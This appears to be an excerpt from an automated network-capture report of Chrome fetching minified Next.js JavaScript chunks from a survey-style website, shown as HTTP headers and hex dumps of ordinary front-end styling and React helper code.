                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 24 32 24 33 24 31 22 2b 63 2b 22 24 32 62 6f 78 24 33 22 29 2b 65 3b 63 61 73 65 20 31 30 30 3a 72 65 74 75 72 6e 20 62 28 65 2c 22 3a 22 2c 22 3a 22 2b 63 29 2b 65 7d 62 72 65 61 6b 3b 63 61 73 65 20 35 37 31 39 3a 63 61 73 65 20 32 36 34 37 3a 63 61 73 65 20 32 31 33 35 3a 63 61 73 65 20 33 39 32 37 3a 63 61 73 65 20 32 33 39 31 3a 72 65 74 75 72 6e 20 62 28 65 2c 22 73 63 72 6f 6c 6c 2d 22 2c 22 73 63 72 6f 6c 6c 2d 73 6e 61 70 2d 22 29 2b 65 7d 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 65 65 28 65 2c 74 2c 72 2c 6e 29 7b 69 66 28 65 2e 6c 65 6e 67 74 68 3e 2d 31 26 26 21 65 2e 72 65 74 75 72 6e 29 73 77 69 74 63 68 28 65 2e 74 79 70 65 29 7b 63 61 73 65 20 68 3a 72 65 74 75 72 6e 20 76 6f 69 64 28 65 2e 72 65 74 75 72 6e 3d 58 28 65 2e 76
                                                                                                          Data Ascii: $2$3$1"+c+"$2box$3")+e;case 100:return b(e,":",":"+c)+e}break;case 5719:case 2647:case 2135:case 3927:case 2391:return b(e,"scroll-","scroll-snap-")+e}return e}function ee(e,t,r,n){if(e.length>-1&&!e.return)switch(e.type){case h:return void(e.return=X(e.v
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 31 32 35 3a 79 3d 30 3b 63 61 73 65 20 35 39 2b 6c 3a 2d 31 3d 3d 53 26 26 28 24 3d 62 28 24 2c 2f 5c 66 2f 67 2c 22 22 29 29 2c 68 3e 30 26 26 50 28 24 29 2d 66 26 26 41 28 68 3e 33 32 3f 73 65 28 24 2b 22 3b 22 2c 6e 2c 72 2c 66 2d 31 2c 63 29 3a 73 65 28 62 28 24 2c 22 20 22 2c 22 22 29 2b 22 3b 22 2c 6e 2c 72 2c 66 2d 32 2c 63 29 2c 63 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 35 39 3a 24 2b 3d 22 3b 22 3b 64 65 66 61 75 6c 74 3a 69 66 28 41 28 4f 3d 6e 65 28 24 2c 74 2c 72 2c 75 2c 6c 2c 6f 2c 69 2c 78 2c 45 3d 5b 5d 2c 6b 3d 5b 5d 2c 66 2c 73 29 2c 73 29 2c 31 32 33 3d 3d 3d 49 29 69 66 28 30 3d 3d 3d 6c 29 72 65 28 24 2c 74 2c 4f 2c 4f 2c 45 2c 73 2c 66 2c 69 2c 6b 29 3b 65 6c 73 65 20 73 77 69 74 63 68 28 39 39 3d 3d 3d 70 26 26 31 31 30 3d 3d 3d 43
                                                                                                          Data Ascii: 125:y=0;case 59+l:-1==S&&($=b($,/\f/g,"")),h>0&&P($)-f&&A(h>32?se($+";",n,r,f-1,c):se(b($," ","")+";",n,r,f-2,c),c);break;case 59:$+=";";default:if(A(O=ne($,t,r,u,l,o,i,x,E=[],k=[],f,s),s),123===I)if(0===l)re($,t,O,O,E,s,f,i,k);else switch(99===p&&110===C
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 72 74 3a 31 2c 67 72 69 64 43 6f 6c 75 6d 6e 3a 31 2c 67 72 69 64 43 6f 6c 75 6d 6e 45 6e 64 3a 31 2c 67 72 69 64 43 6f 6c 75 6d 6e 53 70 61 6e 3a 31 2c 67 72 69 64 43 6f 6c 75 6d 6e 53 74 61 72 74 3a 31 2c 6d 73 47 72 69 64 52 6f 77 3a 31 2c 6d 73 47 72 69 64 52 6f 77 53 70 61 6e 3a 31 2c 6d 73 47 72 69 64 43 6f 6c 75 6d 6e 3a 31 2c 6d 73 47 72 69 64 43 6f 6c 75 6d 6e 53 70 61 6e 3a 31 2c 66 6f 6e 74 57 65 69 67 68 74 3a 31 2c 6c 69 6e 65 48 65 69 67 68 74 3a 31 2c 6f 70 61 63 69 74 79 3a 31 2c 6f 72 64 65 72 3a 31 2c 6f 72 70 68 61 6e 73 3a 31 2c 74 61 62 53 69 7a 65 3a 31 2c 77 69 64 6f 77 73 3a 31 2c 7a 49 6e 64 65 78 3a 31 2c 7a 6f 6f 6d 3a 31 2c 57 65 62 6b 69 74 4c 69 6e 65 43 6c 61 6d 70 3a 31 2c 66 69 6c 6c 4f 70 61 63 69 74 79 3a 31 2c 66 6c 6f
                                                                                                          Data Ascii: rt:1,gridColumn:1,gridColumnEnd:1,gridColumnSpan:1,gridColumnStart:1,msGridRow:1,msGridRowSpan:1,msGridColumn:1,msGridColumnSpan:1,fontWeight:1,lineHeight:1,opacity:1,order:1,orphans:1,tabSize:1,widows:1,zIndex:1,zoom:1,WebkitLineClamp:1,fillOpacity:1,flo
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 64 61 74 61 22 2c 22 64 61 74 61 6c 69 73 74 22 2c 22 64 64 22 2c 22 64 65 6c 22 2c 22 64 65 74 61 69 6c 73 22 2c 22 64 66 6e 22 2c 22 64 69 61 6c 6f 67 22 2c 22 64 69 76 22 2c 22 64 6c 22 2c 22 64 74 22 2c 22 65 6d 22 2c 22 65 6d 62 65 64 22 2c 22 66 69 65 6c 64 73 65 74 22 2c 22 66 69 67 63 61 70 74 69 6f 6e 22 2c 22 66 69 67 75 72 65 22 2c 22 66 6f 6f 74 65 72 22 2c 22 66 6f 72 6d 22 2c 22 68 31 22 2c 22 68 32 22 2c 22 68 33 22 2c 22 68 34 22 2c 22 68 35 22 2c 22 68 36 22 2c 22 68 65 61 64 65 72 22 2c 22 68 67 72 6f 75 70 22 2c 22 68 72 22 2c 22 68 74 6d 6c 22 2c 22 69 22 2c 22 69 66 72 61 6d 65 22 2c 22 69 6d 67 22 2c 22 69 6e 70 75 74 22 2c 22 69 6e 73 22 2c 22 6b 62 64 22 2c 22 6b 65 79 67 65 6e 22 2c 22 6c 61 62 65 6c 22 2c 22 6c 65 67 65 6e 64 22
                                                                                                          Data Ascii: data","datalist","dd","del","details","dfn","dialog","div","dl","dt","em","embed","fieldset","figcaption","figure","footer","form","h1","h2","h3","h4","h5","h6","header","hgroup","hr","html","i","iframe","img","input","ins","kbd","keygen","label","legend"
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 21 30 7d 76 61 72 20 5f 65 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 53 79 6d 62 6f 6c 2e 66 6f 72 2c 6a 65 3d 5f 65 3f 53 79 6d 62 6f 6c 2e 66 6f 72 28 22 72 65 61 63 74 2e 6d 65 6d 6f 22 29 3a 36 30 31 31 35 2c 4e 65 3d 5f 65 3f 53 79 6d 62 6f 6c 2e 66 6f 72 28 22 72 65 61 63 74 2e 66 6f 72 77 61 72 64 5f 72 65 66 22 29 3a 36 30 31 31 32 2c 44 65 3d 7b 63 68 69 6c 64 43 6f 6e 74 65 78 74 54 79 70 65 73 3a 21 30 2c 63 6f 6e 74 65 78 74 54 79 70 65 3a 21 30 2c 63 6f 6e 74 65 78 74 54 79 70 65 73 3a 21 30 2c 64 65 66 61 75 6c 74 50 72 6f 70 73 3a 21 30 2c 64 69 73 70 6c 61 79 4e 61 6d 65 3a 21 30 2c 67 65 74 44 65 66 61 75 6c 74 50 72
                                                                                                          Data Ascii: {return"string"==typeof e&&!0}var _e="function"==typeof Symbol&&Symbol.for,je=_e?Symbol.for("react.memo"):60115,Ne=_e?Symbol.for("react.forward_ref"):60112,De={childContextTypes:!0,contextType:!0,contextTypes:!0,defaultProps:!0,displayName:!0,getDefaultPr


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          37192.168.2.450082104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:21 UTC412OUTGET /_next/static/chunks/b88eab57f2676fbf-1736072686539.7179d464977285be.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:21 UTC496INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:21 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-5df2"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1626
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:21 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb41602ef30f5d-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:21 UTC873INData Raw: 35 64 66 32 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 39 38 30 31 2c 37 36 34 33 35 5d 2c 7b 37 36 34 33 35 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 2c 69 29 7b 69 2e 64 28 65 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 3b 76 61 72 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 65 3d 6e 2e 69 6d 61 67 65 73 4d 61 70 2c 69 3d 6e 2e 72 65 71 75 65 73 74 65 64 49 6d 61 67 65 2c 6f 3d 6e 2e 61 64 64 69 74 69 6f 6e 61 6c 50 72 6f 70 65 72 74 69 65 73 3b 69 66 28 69 29 7b 76 61 72 20 64 3d 65 5b 69 5d 3b 72 65 74 75 72 6e 20 6f 26 26 28 6f 2e 69
                                                                                                          Data Ascii: 5df2"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[59801,76435],{76435:function(n,e,i){i.d(e,{g:function(){return o}});var o=function(n){var e=n.imagesMap,i=n.requestedImage,o=n.additionalProperties;if(i){var d=e[i];return o&&(o.i
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 29 7b 69 2e 64 28 65 2c 7b 68 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 57 7d 7d 29 3b 76 61 72 20 6f 3d 69 28 35 36 37 35 33 29 2c 64 3d 69 28 34 37 37 34 37 29 2c 72 3d 69 28 35 33 34 34 34 29 2c 74 3d 69 28 31 32 31 33 39 29 2c 6c 3d 69 28 39 32 32 32 38 29 2c 75 3d 69 28 39 33 38 38 38 29 3b 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 76 61 72 20 6e 3d 28 30 2c 6c 2e 5a 29 28 5b 22 5c 6e 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 5c 6e 20 20 67 61 70 3a 20 30 2e 35 72 65 6d 3b 5c 6e 20 20 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 37 36 38 70 78 29 20 7b 5c 6e 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 5c 6e 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 5c 6e 20 20 7d 5c 6e 22 5d
                                                                                                          Data Ascii: ){i.d(e,{h:function(){return W}});var o=i(56753),d=i(47747),r=i(53444),t=i(12139),l=i(92228),u=i(93888);function a(){var n=(0,l.Z)(["\n display: flex;\n gap: 0.5rem;\n @media (min-width: 768px) {\n width: 100%;\n justify-content: center;\n }\n"]
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 38 39 33 29 3b 66 75 6e 63 74 69 6f 6e 20 70 28 29 7b 76 61 72 20 6e 3d 28 30 2c 6c 2e 5a 29 28 5b 22 5c 6e 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 36 38 30 70 78 3b 5c 6e 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 5c 6e 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 5c 6e 22 5d 29 3b 72 65 74 75 72 6e 20 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 6e 7d 66 75 6e 63 74 69 6f 6e 20 46 28 29 7b 76 61 72 20 6e 3d 28 30 2c 6c 2e 5a 29 28 5b 22 5c 6e 20 20 66 6c 65 78 3a 20 31 3b 5c 6e 22 5d 29 3b 72 65 74 75 72 6e 20 46 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 6e 7d 66 75 6e 63 74 69 6f 6e 20 78 28 29 7b 76 61 72 20 6e 3d 28 30 2c 6c 2e 5a 29 28 5b 22 5c 6e 20 20 70 6f 69 6e 74 65 72 2d
                                                                                                          Data Ascii: 893);function p(){var n=(0,l.Z)(["\n max-width: 680px;\n position: relative;\n margin: 0 auto;\n"]);return p=function(){return n},n}function F(){var n=(0,l.Z)(["\n flex: 1;\n"]);return F=function(){return n},n}function x(){var n=(0,l.Z)(["\n pointer-
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 3a 32 33 7d 5d 2c 5b 22 49 4e 22 2c 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 49 4e 2e 32 37 65 66 65 30 38 65 2e 73 76 67 22 2c 68 65 69 67 68 74 3a 31 35 2c 77 69 64 74 68 3a 32 31 7d 5d 2c 5b 22 42 52 22 2c 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 42 52 2e 37 62 31 62 63 31 64 64 2e 73 76 67 22 2c 68 65 69 67 68 74 3a 31 37 2c 77 69 64 74 68 3a 32 33 7d 5d 2c 5b 22 4e 47 22 2c 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 4e 47 2e 37 66 33 36 33 64 31 39 2e 73 76 67 22 2c 68 65 69 67 68 74 3a 31 37 2c 77 69 64 74 68 3a 32 33 7d 5d 2c 5b 22 4d 5a 22 2c 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 4d 5a 2e 36 63 31 37
                                                                                                          Data Ascii: :23}],["IN",{src:"/_next/static/media/IN.27efe08e.svg",height:15,width:21}],["BR",{src:"/_next/static/media/BR.7b1bc1dd.svg",height:17,width:23}],["NG",{src:"/_next/static/media/NG.7f363d19.svg",height:17,width:23}],["MZ",{src:"/_next/static/media/MZ.6c17
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 2d 77 69 64 74 68 3a 20 37 36 38 70 78 29 20 7b 5c 6e 20 20 20 20 70 61 64 64 69 6e 67 3a 20 22 2c 22 3b 5c 6e 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 22 2c 22 3b 5c 6e 20 20 7d 5c 6e 20 20 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 30 32 34 70 78 29 20 7b 5c 6e 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 22 2c 22 3b 5c 6e 20 20 7d 5c 6e 22 5d 29 3b 72 65 74 75 72 6e 20 43 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 6e 7d 66 75 6e 63 74 69 6f 6e 20 5f 28 29 7b 76 61 72 20 6e 3d 28 30 2c 6c 2e 5a 29 28 5b 22 5c 6e 20 20 63 6f 6c 6f 72 3a 20 22 2c 22 3b 5c 6e 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 22 2c 22 3b 5c 6e 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 22 2c 22 3b 5c 6e 20 20 40 6d 65 64 69 61 20 28 6d 69
                                                                                                          Data Ascii: -width: 768px) {\n padding: ",";\n font-size: ",";\n }\n @media (min-width: 1024px) {\n font-size: ",";\n }\n"]);return C=function(){return n},n}function _(){var n=(0,l.Z)(["\n color: ",";\n font-size: ",";\n font-weight: ",";\n @media (mi
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 20 63 6f 6c 6f 72 3a 20 22 2c 22 3b 5c 6e 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 22 2c 22 3b 5c 6e 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 22 2c 22 3b 5c 6e 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 22 2c 22 3b 5c 6e 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 22 2c 22 3b 5c 6e 20 20 20 20 70 61 64 64 69 6e 67 3a 20 22 2c 22 3b 5c 6e 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 22 2c 22 3b 5c 6e 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 22 2c 22 3b 5c 6e 20 20 20 20 6d 61 72 67 69 6e 3a 20 22 2c 22 3b 5c 6e 20 20 20 20 64 69 73 70 6c 61 79 3a 20 22 2c 22 3b 5c 6e 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 2d 63 6f 6c 6f 72 3a 20 22 2c 22 3b 5c 6e 20 20 20 20 74 65 78 74 2d 64 65
                                                                                                          Data Ascii: color: ",";\n font-size: ",";\n font-weight: ",";\n letter-spacing: ",";\n line-height: ",";\n padding: ",";\n padding-bottom: ",";\n text-align: ",";\n margin: ",";\n display: ",";\n text-decoration-color: ",";\n text-de
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 61 6e 63 65 53 75 72 76 65 79 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 7c 7c 6e 75 6c 6c 3d 3d 3d 28 69 3d 65 2e 68 65 61 64 65 72 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 3f 76 6f 69 64 20 30 3a 69 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 29 7c 7c 22 74 72 61 6e 73 70 61 72 65 6e 74 22 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 65 2c 69 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 28 65 3d 6e 2e 74 68 65 6d 65 2e 73 68 61 72 65 64 46 69 6e 61 6e 63 65 53 75 72 76 65 79 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 7c 7c 6e 75 6c 6c 3d 3d 3d 28 69 3d 65 2e 68 65 61 64 65 72 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 3f 76 6f 69 64 20 30 3a 69 2e 70 61 64 64 69 6e 67 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 65 2c 69 3b 72 65 74
                                                                                                          Data Ascii: anceSurvey)||void 0===e||null===(i=e.header)||void 0===i?void 0:i.backgroundColor)||"transparent"}),(function(n){var e,i;return null===(e=n.theme.sharedFinanceSurvey)||void 0===e||null===(i=e.header)||void 0===i?void 0:i.padding}),(function(n){var e,i;ret
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 65 7c 7c 6e 75 6c 6c 3d 3d 3d 28 69 3d 65 2e 68 65 61 64 65 72 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 3f 76 6f 69 64 20 30 3a 69 2e 66 6c 65 78 44 69 72 65 63 74 69 6f 6e 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 65 2c 69 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 28 65 3d 6e 2e 74 68 65 6d 65 2e 73 68 61 72 65 64 46 69 6e 61 6e 63 65 53 75 72 76 65 79 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 7c 7c 6e 75 6c 6c 3d 3d 3d 28 69 3d 65 2e 68 65 61 64 65 72 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 3f 76 6f 69 64 20 30 3a 69 2e 77 69 64 74 68 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 65 2c 69 2c 6f 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 28 65 3d 6e 2e 74 68 65 6d 65 2e 73 68 61 72 65 64 46 69 6e 61 6e 63 65 53 75 72 76 65
                                                                                                          Data Ascii: e||null===(i=e.header)||void 0===i?void 0:i.flexDirection}),(function(n){var e,i;return null===(e=n.theme.sharedFinanceSurvey)||void 0===e||null===(i=e.header)||void 0===i?void 0:i.width}),(function(n){var e,i,o;return null===(e=n.theme.sharedFinanceSurve
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 6f 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 28 65 3d 6e 2e 74 68 65 6d 65 2e 73 68 61 72 65 64 46 69 6e 61 6e 63 65 53 75 72 76 65 79 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 7c 7c 6e 75 6c 6c 3d 3d 3d 28 69 3d 65 2e 68 65 61 64 65 72 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 7c 7c 6e 75 6c 6c 3d 3d 3d 28 6f 3d 69 2e 74 65 78 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6f 3f 76 6f 69 64 20 30 3a 6f 2e 62 6f 72 64 65 72 52 61 64 69 75 73 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 65 2c 69 2c 6f 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 28 65 3d 6e 2e 74 68 65 6d 65 2e 73 68 61 72 65 64 46 69 6e 61 6e 63 65 53 75 72 76 65 79 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 7c 7c 6e 75 6c 6c 3d 3d 3d 28 69 3d 65 2e 68 65 61 64 65 72 29 7c 7c 76 6f 69 64
                                                                                                          Data Ascii: o;return null===(e=n.theme.sharedFinanceSurvey)||void 0===e||null===(i=e.header)||void 0===i||null===(o=i.text)||void 0===o?void 0:o.borderRadius}),(function(n){var e,i,o;return null===(e=n.theme.sharedFinanceSurvey)||void 0===e||null===(i=e.header)||void
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 6f 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 28 65 3d 6e 2e 74 68 65 6d 65 2e 73 68 61 72 65 64 46 69 6e 61 6e 63 65 53 75 72 76 65 79 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 7c 7c 6e 75 6c 6c 3d 3d 3d 28 69 3d 65 2e 68 65 61 64 65 72 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 7c 7c 6e 75 6c 6c 3d 3d 3d 28 6f 3d 69 2e 74 65 78 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6f 3f 76 6f 69 64 20 30 3a 6f 2e 6c 69 6e 65 48 65 69 67 68 74 4d 65 64 69 61 31 30 32 34 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 65 2c 69 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 28 65 3d 6e 2e 74 68 65 6d 65 2e 73 68 61 72 65 64 46 69 6e 61 6e 63 65 53 75 72 76 65 79 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 7c 7c 6e 75 6c 6c 3d 3d 3d 28 69 3d 65 2e 68 65 61 64 65 72 29 7c
                                                                                                          Data Ascii: o;return null===(e=n.theme.sharedFinanceSurvey)||void 0===e||null===(i=e.header)||void 0===i||null===(o=i.text)||void 0===o?void 0:o.lineHeightMedia1024}),(function(n){var e,i;return null===(e=n.theme.sharedFinanceSurvey)||void 0===e||null===(i=e.header)|


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          38192.168.2.450083104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:21 UTC553OUTGET /_next/static/chunks/e349ffdbb65d6c93-1736072686539-660e5b7e2e3b7996.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:21 UTC496INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:21 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-2a00"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1054
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:21 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb4162bad743b9-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:21 UTC873INData Raw: 32 61 30 30 0d 0a 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 36 39 30 31 5d 2c 7b 35 36 36 32 39 3a 66 75 6e 63 74 69 6f 6e 28 5f 5f 75 6e 75 73 65 64 5f 77 65 62 70 61 63 6b 5f 6d 6f 64 75 6c 65 2c 65 78 70 6f 72 74 73 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 5f 5f 61 77 61 69 74 65 72 3d 74 68 69 73 26 26 74 68 69 73 2e 5f 5f 61 77 61 69 74 65 72 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 72 65 74 75 72 6e 20 6e 65 77 28 6e 7c 7c 28 6e 3d 50 72 6f 6d 69 73 65 29 29 28 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 61 29 7b 66 75 6e 63 74 69 6f 6e 20 69 28 65 29 7b 74 72 79 7b 73 28 72 2e 6e 65 78 74 28
                                                                                                          Data Ascii: 2a00(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[56901],{56629:function(__unused_webpack_module,exports){"use strict";var __awaiter=this&&this.__awaiter||function(e,t,n,r){return new(n||(n=Promise))((function(o,a){function i(e){try{s(r.next(
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 28 6f 3d 32 26 75 5b 30 5d 3f 72 2e 72 65 74 75 72 6e 3a 75 5b 30 5d 3f 72 2e 74 68 72 6f 77 7c 7c 28 28 6f 3d 72 2e 72 65 74 75 72 6e 29 26 26 6f 2e 63 61 6c 6c 28 72 29 2c 30 29 3a 72 2e 6e 65 78 74 29 26 26 21 28 6f 3d 6f 2e 63 61 6c 6c 28 72 2c 75 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 6f 3b 73 77 69 74 63 68 28 72 3d 30 2c 6f 26 26 28 75 3d 5b 32 26 75 5b 30 5d 2c 6f 2e 76 61 6c 75 65 5d 29 2c 75 5b 30 5d 29 7b 63 61 73 65 20 30 3a 63 61 73 65 20 31 3a 6f 3d 75 3b 62 72 65 61 6b 3b 63 61 73 65 20 34 3a 72 65 74 75 72 6e 20 69 2e 6c 61 62 65 6c 2b 2b 2c 7b 76 61 6c 75 65 3a 75 5b 31 5d 2c 64 6f 6e 65 3a 21 31 7d 3b 63 61 73 65 20 35 3a 69 2e 6c 61 62 65 6c 2b 2b 2c 72 3d 75 5b 31 5d 2c 75 3d 5b 30 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61
